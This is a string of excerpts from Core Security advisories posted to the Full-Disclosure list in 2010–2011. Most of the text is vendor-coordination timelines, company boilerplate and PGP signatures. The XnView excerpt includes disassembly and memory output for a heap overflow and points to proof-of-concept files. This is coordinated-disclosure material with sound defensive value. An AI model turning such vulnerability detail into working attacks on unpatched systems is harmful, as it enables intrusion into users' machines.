2011-02-07: Core asks if Zoho team will be ready for disclosure next Thursday Feb 10th in order to coordinate the advisory publication. . 2011-02-08: The Zoho team notifies that they are ready with the Engineering Release version ADSelfService Plus 4.5 Build 4500. This version of ADSelfService Plus has taken into consideration and also addressed all security vulnerabilities highlighted by this advisory. Zoho is going to make a public announcement by Tomorrow. . 2011-02-10: The advisory CORE-2011-0103 is published. 10. *References* [1] ADSelfService Plus http://www.manageengine.com/products/self-service-password. [2] Manikandan.T, Senior Program Manager, ManageEngine ADSelfService Plus. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com/. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and prove real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team
[Full-disclosure] [CORE-2010-0728] Symantec Intel Handler Service Remote Denial-of-Service
of the initial report of the vulnerability. . 2010-09-09: After two weeks with no replies, Core again requests the date of the initial report of the vulnerability, and asks if the release of the fix is still on track for the end of September. . 2010-09-16: Vendor replies that they will not be able to release fixes before the end of the year, as they have to correct third-party code by themselves. . 2010-09-21: Core requests confirmation that the vendor won't release a fix before the end of the year. . 2010-09-22: Vendor confirms that they won't be able to release fixes until the end of the year, as fixing third-party code is taking time. However, the vendor explains that current versions of the product have the vulnerable functionality disabled, that old versions of the product do not install the vulnerable functionality by default, and that installation of this functionality is not recommended. . 2010-10-05: Core requests version numbers for vulnerable and non-vulnerable versions of the software, and asks if vulnerable users can update to a non-vulnerable version. . 2010-09-06: Vendor replies with the version numbers and confirms that vulnerable users have to wait for the patch. . 2010-10-07: Core decides to push the release date forward and wait for the release of the patch. . 2010-10-22: Core asks Symantec for a precise release date for the fixes, and explains that the publication of the advisory won't be pushed further than December 2010. . 2010-10-23: Vendor replies that the last known date was during December, and that they will confirm a firmer date. . 2010-11-01: Core asks Symantec if a firmer release date has been confirmed. . 2010-11-03: Vendor replies that the engineering team has not confirmed a release date, and asks if Core can hold the publication of the advisory until the end of the year. . 2010-11-25: Core replies that the December 13th release date is fixed, and requests an update on the status of the patches. . 2010-12-13: No update received, advisory CORE-2010-0728 is published. 10. *References* 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: [http://corelabs.coresecurity.com]. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAk0GR4UACgkQyNibggitWa1iKQCfYtzFZOnNGpclzNZEDrwM08wr gwsAn2UYlqC0+IpliLAVTn/ItK4Sc3ne =Up/o -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2010-1109 - Multiple vulnerabilities in BugTracker.Net
information and shared software tools for public use at: [http://corelabs.coresecurity.com]. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 12. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/] 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2010-1018 - Landesk OS command injection
team notifies the version numbers of the affected and patched versions, and also sends the workaround mentioned in the [Sec. 6]. . 2010-11-08: LANDesk team requests to postpone the advisory publication for 24hs given that they are unable to be ready by that time. . 2010-11-09: Core re-schedules the advisory publication to November 10th. . 2010-11-10: The advisory CORE-2010-1018 is published. 10. *References* [1] LANDesk website [http://www.landesk.com/]. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: [http://corelabs.coresecurity.com]. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/] 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CORE-2010-0825] Apple OS X ATSServer CFF CharStrings INDEX Sign Mismatch
of publication. . 2010-08-31: Apple asks Core about credit information for the advisory. . 2010-09-28: Core acknowledges the comunication sending the credit information for this report. . 2010-10-20: Core asks Apple for a firm date for the release of this securiry issue since the initial propossed timeframe of October 18th is due. . 2010-10-22: Apple acknowledges the comunication informing that the publication date is scheduled to the week of October 25th. Also, Apple notifies that the assigned identifier for this vulnerability is CVE-2010-1797. . 2010-11-01: Core asks Apple for a new schedule for the publication, since there was no notice of any Apple security update during the week of October 25th. . 2010-11-01: Apple acknowledges the communication informing that the publication date was rescheduled to the middle of the week of November 1st. . 2010-11-03: Core informs Apple that the publication of this advisory was scheduled to Monday 8th, taking into account the last communication this is a final publication date. Core also informs that the information about how this vulnerability was found and how it can be exploited will be discussed in a small infosec related local event in Buenos Aires city. . 2010-11-08: Core publishes advisory CORE-2010-0825. 9. *References* [1] [http://en.wikipedia.org/wiki/PostScript_fonts#Compact_Font_Format] 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: [http://corelabs.coresecurity.com]. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 12. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/] 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.12 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkzYayoACgkQyNibggitWa2PMgCfSvLwR5OgWfmFIwpONWL+dMa3 njEAnjIZFF+zG/wWK3IscWx3VyNW5F30 =XULv -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CORE-2010-0819] LibSMI smiGetNode Buffer Overflow When Long OID Is Given In Numerical Form
developers of libsmi, Juergen Schoenwaelder and Frank Strauss. . 2010-09-07: Core Security Technologies contacts Juergen Schoenwaelder and Frank Strauss at their supplies e-mail addresses, telling about a found vulnerability and offering an advisory draft in either plain or encripted form. . 2010-09-07: Frank Strauss' e-mail address bounces Core Security Technologies' e-mail back, informing about a new e-mail address. Core Security Technologies sends the message again to the new address. . 2010-09-07: Juergen Schoenwaelder replies with his PGP keys, and copies Vincent Bernat again in the conversation. . 2010-09-09: Core Security Technologies sends and encripted draft of this advisory to Juergen Schoenwaelder and Vincent Bernat, with apologies due to the delay caused by Pedro Varangot [http://corelabs.coresecurity.com/index.php?module=Wikiaction=viewtype=researchername=Pedro_Varangot] being on leave due to health issues. The advisory draft mentions Net-SNMP as possible vulnerabile software. . 2010-09-11: Juergen Schoenwaelder replies with a patch fixing the vulnerability, and correcting some tecnical information in the advisory draft regarding the impact of the vulnerability, stating that it is likely low and that Net-SNMP is not affected. . 2010-09-27: Core Security Technologies replies to Juergen Schoenwaelder and Vincent Bernat agreeing that the impact of the vulnerability is low and removes the mention of Net-SNMP in the avisory. Core Security Technologies asks for a timeline regarding the release of a fixed version of libsmi stating that this advisory will be released anyway, because someone may be using libsmi in his software introducing a vulnerability he may not know about. No reply is received for this e-mail. . 2010-10-04: Core Security Technologies notifies Juergen Schoenwaelder and Vincent Bernat that October the 18th has been set as a tentative release date for this advisory, and that the release date is open to discussion if commitment to release a fixed version of libsmi in a given timeframe is given. . 2010-10-08: Juergen Schoenwaelder replies with sugestions for the vulnerable packages and vendor information section of this advisory. He also mentions that Core Security Technologies should go with the October de 18th release date for this advisory. . 2010-10-08: Core Security Technologies incorporates Juergen Schoenwaelder's suggestions to the advisory, and again mentions that the advisory can be rescheduled if it is deemed necesary by the vendor. . 2010-10-20: Advisory CORE-2010-0819 is released. 10. *References* [1] [http://www.ibr.cs.tu-bs.de/projects/libsmi/] [2] [http://www.ibr.cs.tu-bs.de/projects/libsmi/libsmi.html] 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: [http://corelabs.coresecurity.com/]. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/] 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: GnuPT v3.6.3 Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAky
[Full-disclosure] CORE-2010-0517 - Microsoft Office HtmlDlgHelper class memory corruption
comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 12. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/] 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CORE-2010-0624] MS OpenType CFF Parsing Vulnerability
, and confirms that the vulnerability is locally exploitable. . 2010-10-12: Advisory CORE-2010-0624 is published. 10. *References* 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: [http://corelabs.coresecurity.com/]. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/] 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAky0jIYACgkQyNibggitWa2G7gCgndqT2EjZ7++mvRK6DzmKP4Rt tH0AoJ7mgNjoAdvCll0iRFI7QHRSG2wK =WNYa -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] (CORE-2010-0701) Adobe Acrobat Reader Acrord32.dll Use After Free Vulnerability
of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: [http://www.coresecurity.com/corelabs]. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 12. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/] 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.12 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkystXYACgkQyNibggitWa33EQCfT55LUL5PG2WUscpSikemiVeY yNMAnjhSH0EitGnENPDAbWJz3+JiZXPh =nN2s -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CORE-2010-0623] Microsoft Windows CreateWindow function callback vulnerability
: Core asks Microsoft for data regarding their future security bulletin in order to include it in the vendor section of this advisory. . 2010-08-04: Microsoft replies with the data Core asked for, and mentions that, if possible, they would like to see an advisory draft. Microsoft also asks for confirmation on credits for the acknowledgement section of their report. . 2010-08-04: Core replies with a draft of this advisory and a minor correction regarding an accent mark on the credits for the acknowledgement section. . 2010-08-09: Core sends a more polished draft for the advisory. . 2010-08-10: Microsoft acknowledges the advisory draft and the minor correction regarding the accent mark. . 2010-08-10: Microsoft Security Bulletin MS10-048 is published. . 2010-08-10: Advisory CORE-2010-0623 is published. 10. *References* [1] Microsoft Security Bulletin MS10-032 [http://www.microsoft.com/technet/security/bulletin/ms10-032.mspx] 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: [http://corelabs.coresecurity.com/]. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/] 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: GnuPT v3.6.3 Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkxhpQ0ACgkQyNibggitWa3Q7gCfVgpuM7KDIIZ30RhJ9zPCOhl+ 37IAoLMnTLUuZbvGpDlpjqmft5z0AFZ+ =ECTt -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2010-0407: Microsoft Office Excel PivotTable Cache Data Record Buffer Overflow
. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/] 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAkxhsvMACgkQyNibggitWa3SZQCeIQ9oxM48E4FXX2yxcKW+XFts 1jMAoKvDR2SVz6mTGp7S44g5s9AMQlx7 =Z2wt -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [CORE-2010-0405] Adobe Director Invalid Read
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://corelabs.coresecurity.com/ Adobe Director DIRAPI.DLL Invalid Read Vulnerability Additional research on this vulnerability was performed by Core Security Technologies researchers. Updated technical information has been published at: http://www.coresecurity.com/content/adobe-director-memory-corruption -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkxcU2UACgkQyNibggitWa2xrQCgo5BWGlgA8VC4drNpdLlNT4uX HdEAoJNiuBrGAt7eKMdhDhSmTIDNbvwx =hLcP -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CORE-2010-0608] HP OpenView NNM OvJavaLocale Buffer Overflow Vulnerability
to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) Licence: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/] 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: GnuPT v3.6.3 Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkxYb4AACgkQyNibggitWa2juACcDs20mlODxEt60A6IH2vTVeWS Hs0AnjldjfUIwiNNQSumvp/h8bEq7yXL =oYbV -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2010-0316 - Novell iManager Multiple Vulnerabilities
that it was published for about 20 minutes. Core also notifies there will be a meeting of the Core Advisories Team in order to evaluate this case tomorrow (Thursday 3th) 19.30 GMT. If the iManager team does not mean to release patches then, there is not a good reason to postpone the advisory publication till Aug 2010. . 2010-06-03: The iManager team notifies the plan to release a 2.7.3 ftf4 to fix these 2 issues and another issue. iManager 2.7.3 ftf4 would be released before August, but there is no date yet. . 2010-06-03: Core agrees to postpone the advisory publication waiting for the 2.7.3 ftf4 release. The advisory is re-scheduled for publication to the Monday 21th June, 2010. Core notifies this date can be moved if the iManager team need it, but the iManager team should provide a clear report about the progress of the fixing process in order to request moving the release date. . 2010-06-15: Core requests a status update to the iManager team. . 2010-06-17: Core requests a status update to the iManager team and notifies the advisory will be released next Monday as planned. . 2010-06-18: The iManager team notifies they are waiting on a response from another Novell product that ships with iManager, to make sure they will also be able to consume the new version of iManager and release before August. The iManager team also notifies they will contact Core with the timeline today. . 2010-06-23: The advisory CORE-2010-0316 is published. 10. *References* [1] Novell iManager: [http://www.novell.com/products/consoles/imanager/overview.html]. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: [http://www.coresecurity.com/corelabs]. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkwifQUACgkQyNibggitWa1meQCfX8hLENduIFbfOtEAh08CDEUb rJwAoIU+v/I4bPYp5f37zN5R/KKJ5ffB =OoGO -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2010-0514: XnView MBM Processing Heap Overflow
41 41 41 41 41 01355648 41 41 41 41 41 41 41 41 EE FE EE FE EE FE EE FE - -/ The error is the following: since it copies DWORDs, instead of copying 0x1E bytes, it should have copied 0x0F bytes (0x1E / 2). Finally, the heap block is allocated in this part of the code: /- 005AC5F756 PUSH ESI // Heap Size 005AC5F86A 08 PUSH 8// HEAP_ZERO_MEMORY 005AC5FAFF35 A4347900 PUSH DWORD PTR DS:[7934A4] // Heap 005AC600FF15 84726E00 CALL DWORD PTR DS:[KERNEL32.HeapAlloc] ; ntdll.RtlAllocateHeap - -/ 9. *Report Timeline* . 2010-05-27: Core Security Technologies notifies XnView of the vulnerability. . 2010-05-27: The XnView author acknowledges receipt of the notification. . 2010-05-27: Core sends a technical description of the vulnerability, and a Proof-of-Concept file that triggers the bug. . 2010-05-28: The XnView author notifies Core that the vulnerability has been fixed, and that a fixed version will be released. . 2010-06-02: Core asks XnView when the fixed version will be released, in order to coordinate the publication of the advisory with the release of a fixed version. . 2010-06-03: The XnView author responds that version 1.97.5 will be available in 2 weeks. . 2010-06-03: Core requests a more precise date for the release, and reschedules publication of its advisory to June 14th, 2010. . 2010-06-07: The XnView author responds that the update will be available on June 14th. . 2010-06-10: Core sends a second Proof-of-Concept, and asks the XnView author if it triggers a different vulnerability. . 2010-06-11: The XnView author responds that the second PoC triggers the same vulnerability. . 2010-06-14: Advisory CORE-2010-0514 is published. 10. *References* [1] XnView website [http://www.xnview.com/] [2] Proof of Concept files [http://www.coresecurity.com/files/attachments/CORE-2010-0514-Xnview-PoCs.rar] [3] MBM file format [http://software.frodo.looijaard.name/psiconv/formats/MBM_File.html] [4] Basic elements: LListL [http://software.frodo.looijaard.name/psiconv/formats/Basic_Elements.html#LListL] [5] Paint Data Section [http://software.frodo.looijaard.name/psiconv/formats/Paint_Data_Section.html#Paint%20Data%20Section] 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several 